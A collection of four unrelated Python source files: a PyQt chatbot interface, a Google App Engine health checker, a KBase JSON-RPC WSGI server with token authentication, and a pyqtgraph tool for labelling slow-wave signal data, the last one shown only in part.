ux.py
|
import sys
import logging
import time
from PyQt5 import QtCore, Qt, QtGui
from PyQt5.QtCore import QThread
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QMainWindow
from emoji import emojize
from sugaroid.brain.constants import emotion_mapping as emotion
from sugaroid.brain.ooo import Emotion
from sugaroid.gui.ui.main import Ui_MainWindow
import threading
class AudioRequests:
"""
Allows sugaroid to simultaneously run the
Audio Requests thread as well as the Emotion Changing thread
"""
def __init__(self, parent, ress):
self.parent = parent
self.response = ress
def run(self):
self.parent.parent.tts.speak(self.response)
class EmotionRequests(QThread):
"""
Runs the emotion changing thread detached
from the ``__main__`` thread
"""
def __init__(self, parent, emo):
QThread.__init__(self, parent)
self.parent = parent
self.emotion = emo
def run(self):
self.parent.label.setPixmap(
QPixmap(":/home/{}.png".format(emotion[self.emotion]))
)
time.sleep(5)
self.parent.label.setPixmap(QPixmap(":/home/sugaroid.png"))
class BotRequests(QThread):
"""
Asks sugaroid for responses on a detached thread
from the main thread and also spawns ``AudioRequests`` and
``EmotionRequests`` if audio is enabled
"""
def __init__(self, parent):
QThread.__init__(self, parent)
self.parent = parent
def run(self):
text = self.parent.chatbox.text()
self.parent.conv.addItem("you: {}".format(text))
self.parent.chatbox.setText("")
self.parent.conv.scrollToBottom()
response = self.parent.parent.parse(text)
self.parent.conv.addItem("sugaroid: {}".format(emojize(str(response))))
time.sleep(0.1)
if response.emotion != 0:
self.parent.label.setPixmap(
QPixmap(":/home/{}.png".format(emotion[response.emotion]))
)
self.parent.conv.scrollToBottom()
time.sleep(5)
self.parent.label.setPixmap(QPixmap(":/home/sugaroid.png"))
self.parent.conv.scrollToBottom()
if self.parent.parent.audio:
aud = AudioRequests(self.parent, str(response))
y = threading.Thread(target=aud.run)
y.start()
class InterfaceSugaroidQt(QMainWindow, Ui_MainWindow):
"""
Prepares the user interface of Sugaroid on the main
thread and spawns a ``BotRequests`` thread on an adjacent
thread
"""
def __init__(self, parent=None):
QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
self.sleep = 0
self.sleep_enabled = True
if parent is None:
from sugaroid.sugaroid import Sugaroid
sg = Sugaroid()
self.parent = sg
else:
self.parent = parent
def init(self):
self.push.pressed.connect(self.refresh)
self.chatbox.returnPressed.connect(self.refresh)
self.conv.clear()
self.show()
self.chatbox.setFocus()
def refresh(self):
if str(self.chatbox.text()).isspace():
return
movie = QtGui.QMovie(":/home/sugaroid_thinking3.gif")
self.label.setMovie(movie)
movie.start()
bot = BotRequests(self)
bot.start()
|
health_check_service.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A health checking implementation for the SDK.
This code attempts to match the production implementation as closely as
possible in apphosting/runtime/vm/vm_health_check.cc.
One instance of HealthChecker should be created per instance.Instance that has
health checking enabled. The HealthChecker instance needs to be started, but
will stop itself automatically.
"""
import logging
import threading
import time
from google.appengine.api import request_info
from google.appengine.tools.devappserver2 import start_response_utils
class _HealthCheckState(object):
"""A class to track the state of a health checked instance."""
def __init__(self):
"""Initializes a _HealthCheckState object."""
self.consecutive_healthy_responses = 0
self.consecutive_unhealthy_responses = 0
self.is_last_successful = False
def update(self, healthy):
"""Updates the state.
Args:
healthy: Bool indicating whether the last attempt was healthy.
"""
self.is_last_successful = healthy
if healthy:
self.consecutive_healthy_responses += 1
self.consecutive_unhealthy_responses = 0
else:
self.consecutive_healthy_responses = 0
self.consecutive_unhealthy_responses += 1
def __str__(self):
"""Outputs the state in a readable way for logging."""
tmpl = '{number} consecutive {state} responses.'
if self.consecutive_healthy_responses:
number = self.consecutive_healthy_responses
state = 'HEALTHY'
else:
number = self.consecutive_unhealthy_responses
state = 'UNHEALTHY'
return tmpl.format(number=number, state=state)
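# Illustrative sketch (not part of the original module): the counters flip as soon
# as a streak is broken, which is what the threshold checks below rely on.
def _health_check_state_example():
    state = _HealthCheckState()
    state.update(True)
    state.update(True)
    assert state.consecutive_healthy_responses == 2
    state.update(False)
    assert state.consecutive_healthy_responses == 0
    assert state.consecutive_unhealthy_responses == 1
    return str(state)  # '1 consecutive UNHEALTHY responses.'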
class HealthChecker(object):
"""A class to perform health checks for an instance.
This class uses the settings specified in appinfo.HealthCheck and the
callback specified to check the health of the specified instance. When
appropriate, this class changes the state of the specified instance so it is
placed into or taken out of load balancing. This class will also use another
callback to restart the instance, if necessary.
"""
def __init__(self, instance, config, send_request, restart):
"""Initializes a HealthChecker object.
Args:
instance: An instance.Instance object.
config: An appinfo.HealthCheck object.
send_request: A function to call that makes the health check request.
restart: A function to call that restarts the instance.
"""
self._instance = instance
self._config = config
self._send_request = send_request
self._restart = restart
def start(self):
"""Starts the health checks."""
self._instance.set_health(False)
logging.info('Health checks starting for instance %s.',
self._instance.instance_id)
loop = threading.Thread(target=self._loop, name='Health Check')
loop.daemon = True
loop.start()
def _should_continue(self):
return self._running and not self._instance.has_quit
def _loop(self):
"""Performs health checks and updates state over time."""
state = _HealthCheckState()
self._running = True
while self._should_continue():
logging.debug('Performing health check for instance %s.',
self._instance.instance_id)
self._do_health_check(state)
logging.debug('Health check state for instance: %s: %s',
self._instance.instance_id, state)
time.sleep(self._config.check_interval_sec)
def _do_health_check(self, state):
health = self._get_health_check_response(state.is_last_successful)
state.update(health)
self._maybe_update_instance(state)
def _maybe_update_instance(self, state):
"""Performs any required actions on the instance based on the state.
Args:
state: A _HealthCheckState object.
"""
if (state.consecutive_unhealthy_responses >=
self._config.unhealthy_threshold):
self._instance.set_health(False)
elif (state.consecutive_healthy_responses >=
self._config.healthy_threshold):
self._instance.set_health(True)
if (state.consecutive_unhealthy_responses >=
self._config.restart_threshold):
self._restart_instance()
def _get_health_check_response(self, is_last_successful):
"""Sends the health check request and checks the result.
Args:
is_last_successful: Whether the last request was successful.
Returns:
A bool indicating whether or not the instance is healthy.
"""
start_response = start_response_utils.CapturingStartResponse()
try:
response = self._send_request(start_response, is_last_successful)
except request_info.Error:
logging.warning('Health check for instance {instance} is not '
'ready yet.'.format(instance=self._instance.instance_id))
return False
logging.debug('Health check response %s and status %s for instance %s.',
response, start_response.status, self._instance.instance_id)
return start_response.status == '200 OK'
def _restart_instance(self):
"""Restarts the running instance, and stops the current health checker."""
logging.warning('Restarting instance %s because of failed health checks.',
self._instance.instance_id)
self._running = False
self._restart()
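# Wiring sketch (hypothetical; the real caller passes an instance.Instance and an
# appinfo.HealthCheck object). A send_request callback that reports '200 OK' through
# the captured start_response keeps the instance in load balancing:
#
#   def send_request(start_response, is_last_successful):
#       start_response('200 OK', [])
#       return ['ok']
#
#   checker = HealthChecker(instance, health_check_config,
#                           send_request=send_request, restart=restart_callback)
#   checker.start()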
|
test_shjchanServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from test_shjchan.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-server-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'test_shjchan'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from test_shjchan.test_shjchanImpl import test_shjchan # noqa @IgnorePep8
impl_test_shjchan = test_shjchan(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
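# Illustrative sketch (not part of the original service): the encoder lets json.dumps
# serialize sets and frozensets by converting them to lists, e.g.
#   json.dumps({'ids': set([1, 2, 3])}, cls=JSONObjectEncoder)
# which yields '{"ids": [1, 2, 3]}' (element order may vary).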
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is the same as call() except that the return value is a Python
object instead of a JSON string. This method is mainly useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
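# Illustrative sketch (hypothetical values): when the X headers are trusted, the
# first address in a comma separated X-Forwarded-For list wins.
def _example_get_ip_address():
    env = {'HTTP_X_FORWARDED_FOR': '203.0.113.7, 10.0.0.1',
           'REMOTE_ADDR': '127.0.0.1'}
    return getIPAddress(env)  # '203.0.113.7' unless dont_trust_x_ip_headers is 'true'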
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'test_shjchan'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_test_shjchan.filter_contigs,
name='test_shjchan.filter_contigs',
types=[dict])
self.method_authentication['test_shjchan.filter_contigs'] = 'required' # noqa
self.rpc_service.add(impl_test_shjchan.status,
name='test_shjchan.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'test_shjchan ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
GuiWindowDocks.py
|
""" Standard imports """
"""
Author: Shameer Sathar
Description: Provide Gui Interface.
"""
import numpy as np
from multiprocessing import Process
# Main GUI support
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui
from pyqtgraph.dockarea import *
import cPickle as pickle
# Locally-developed modules
from TrainingData import TrainingData
from ARFFcsvReader import ARFFcsvReader
from WekaInterface import WekaInterface
from FeatureAnalyser import FeatureAnalyser
from ClassifySlowWavesScikit import ClassifySlowWavesScikit
import config_global as cg
import scipy.io
class GuiWindowDocks:
def __init__(self):
"""
Initialise the properties of the GUI. This part of the code sets up the docks and sizes.
:return: None
"""
self.app = QtGui.QApplication([])
self.win = QtGui.QMainWindow()
area = DockArea()
self.d_control = Dock("Dock Controls", size=(50, 200))
self.d_plot = Dock("Dock Plots", size=(500, 200))
self.d_train = Dock("Training Signal", size=(500, 50))
area.addDock(self.d_control, 'left')
area.addDock(self.d_plot, 'right')
area.addDock(self.d_train, 'bottom', self.d_plot)
self.win.setCentralWidget(area)
self.win.resize(1500, 800)
self.win.setWindowTitle('GUI Training')
self.addDockWidgetsControl()
self.curves_left = []
self.curves_right = []
self.curve_bottom = []
self.addDockWidgetsPlots()
self.setCrosshair()
self.setRectRegionROI()
self.elec = []
self.data = []
self.trainingData = TrainingData()
self.saveBtn_events.clicked.connect(lambda: self.analyse_data())
self.saveBtn_nonEvents.clicked.connect(lambda: self.add_non_events())
self.undoBtn.clicked.connect(lambda: self.undo())
self.analyseBtn.clicked.connect(lambda: self.process_data())
self.readPredictedVal.clicked.connect(lambda: self.read_predicted())
self.analyseInternal.clicked.connect(lambda: self.analyse_internal())
self.save_trained_data.clicked.connect(lambda: self.save_trained())
self.load_trained_data.clicked.connect(lambda: self.load_trained())
self.win.show()
def addDockWidgetsControl(self):
w1 = pg.LayoutWidget()
label = QtGui.QLabel('Usage info')
self.saveBtn_events = QtGui.QPushButton('Save As Events')
self.saveBtn_nonEvents = QtGui.QPushButton('Save As Non-Events')
self.undoBtn = QtGui.QPushButton('Undo')
self.analyseBtn = QtGui.QPushButton('Analyse')
self.readPredictedVal = QtGui.QPushButton('Read Weka CSV')
self.analyseInternal = QtGui.QPushButton('SciKit Analyse')
self.save_trained_data = QtGui.QPushButton('Save Training')
self.load_trained_data = QtGui.QPushButton('Load Training')
w1.addWidget(label, row=0, col=0)
w1.addWidget(self.saveBtn_events, row=1, col=0)
w1.addWidget(self.saveBtn_nonEvents, row=2, col=0)
w1.addWidget(self.undoBtn, row=3, col=0)
w1.addWidget(self.analyseBtn, row=4, col=0)
w1.addWidget(self.readPredictedVal, row=5, col=0)
w1.addWidget(self.analyseInternal, row=6, col=0)
w1.addWidget(self.save_trained_data, row=7, col=0)
w1.addWidget(self.load_trained_data, row=8, col=0)
self.d_control.addWidget(w1, row=1, colspan=1)
def addDockWidgetsPlots(self):
self.w1 = pg.PlotWidget(title="Plots of the slow-wave data")
self.w2 = pg.PlotWidget(title="Plots of zoomed-in slow-wave data")
self.w3 = pg.PlotWidget(title="Selected Data for Training")
c = pg.PlotCurveItem(pen=pg.mkPen('r', width=2))
c_event = pg.PlotCurveItem(pen=pg.mkPen('y', width=2))
self.curve_bottom.append(c)
self.curve_bottom.append(c_event)
self.w3.addItem(c)
self.w3.addItem(c_event)
nPlots = 256
for i in range(nPlots):
c1 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
c1.setPos(0, i * 20)
self.curves_left.append(c1)
self.w1.addItem(c1)
self.w1.setYRange(0, 900)
self.w1.setXRange(0, 3000)
c2 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
c2.setPos(0, i * 20)
self.curves_right.append(c2)
self.w2.addItem(c2)
self.s1 = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
self.s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
self.w1.addItem(self.s1)
self.w2.addItem(self.s2)
self.d_plot.addWidget(self.w1, row=0, col=0)
self.d_plot.addWidget(self.w2, row=0, col=1)
self.d_train.addWidget(self.w3, row=0, col=0)
self.proxy = pg.SignalProxy(self.w2.scene().sigMouseMoved, rateLimit=60, slot=self.mouseMoved)
self.w2.scene().sigMouseClicked.connect(self.onClick)
self.w2.sigXRangeChanged.connect(self.updateRegion)
self.w2.sigYRangeChanged.connect(self.updateRegion)
def setCrosshair(self):
"""
Cross hair definition and initiation
"""
self.vLine = pg.InfiniteLine(angle=90, movable=False)
self.hLine = pg.InfiniteLine(angle=0, movable=False)
self.w2.addItem(self.vLine, ignoreBounds=True)
self.w2.addItem(self.hLine, ignoreBounds=True)
def setRectRegionROI(self):
'''
Rectangular selection region
'''
self.rect = pg.RectROI([300, 300], [1500, 100], pen=pg.mkPen(color='y', width=2))
self.w1.addItem(self.rect)
self.rect.sigRegionChanged.connect(self.updatePlot)
def setCurveItem(self, nPlots, nSamples):
for i in range(nPlots):
c1 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
self.w1.addItem(c1)
c1.setPos(0, i * 20)
self.curves_left.append(c1)
self.w1.setYRange(0, 900)
self.w1.setXRange(0, 3000)
self.w1.resize(600, 900)
c2 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
self.w2.addItem(c2)
c2.setPos(0, i * 20)
self.curves_right.append(c2)
self.w2.showGrid(x=True, y=True)
self.w2.resize(600, 900)
self.updatePlot()
def setData(self, data, nPlots, nSize):
self.data = data
self.trainingData.setData(data)
self.setCurveItem(nPlots, nSize)
for i in range(nPlots):
self.curves_left[i].setData(data[i])
self.curves_right[i].setData(data[i])
def updatePlot(self):
xpos = self.rect.pos()[0]
ypos = self.rect.pos()[1]
width = self.rect.size()[0]
height = self.rect.size()[1]
self.w2.setXRange(xpos, xpos+width, padding=0)
self.w2.setYRange(ypos, ypos+height, padding=0)
def updateRegion(self):
xpos = self.w2.getViewBox().viewRange()[0][0]
ypos = self.w2.getViewBox().viewRange()[1][0]
self.rect.setPos([xpos, ypos], update=False)
def mouseMoved(self, evt):
pos = evt[0]
vb = self.w2.plotItem.vb
if self.w2.sceneBoundingRect().contains(pos):
mousePoint = vb.mapSceneToView(pos)
self.vLine.setPos(mousePoint.x())
self.hLine.setPos(mousePoint.y())
def onClick(self, evt):
pos = evt.scenePos()
vb = self.w2.plotItem.vb
if self.w2.sceneBoundingRect().contains(pos):
mousePoint = vb.mapSceneToView(pos)
self.elec.append([int(round(mousePoint.y()/20)), int(round(mousePoint.x()))])
self.trainingData.addRegion([int(round(mousePoint.y()/20)), int(round(mousePoint.x()))])
"""
The binding functions for different gui command buttons.
"""
def analyse_data(self):
self.trainingData.add_events()
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
def add_non_events(self):
self.trainingData.add_non_events()
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
def undo(self):
self.trainingData.undo()
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
def read_predicted(self):
filename = QtGui.QFileDialog.getOpenFileName(None, 'Open ARFF WEKA generated output file')
if filename == u'':
return
test = ARFFcsvReader(filename)
prediction = np.asarray(test.get_prediction())
diff = np.diff(prediction)
linear_at = np.array(np.where(diff == 1))
pos = []
length = len(self.data[1])
for val in linear_at.transpose():
pos.append([int(val/length), int(val % length)])
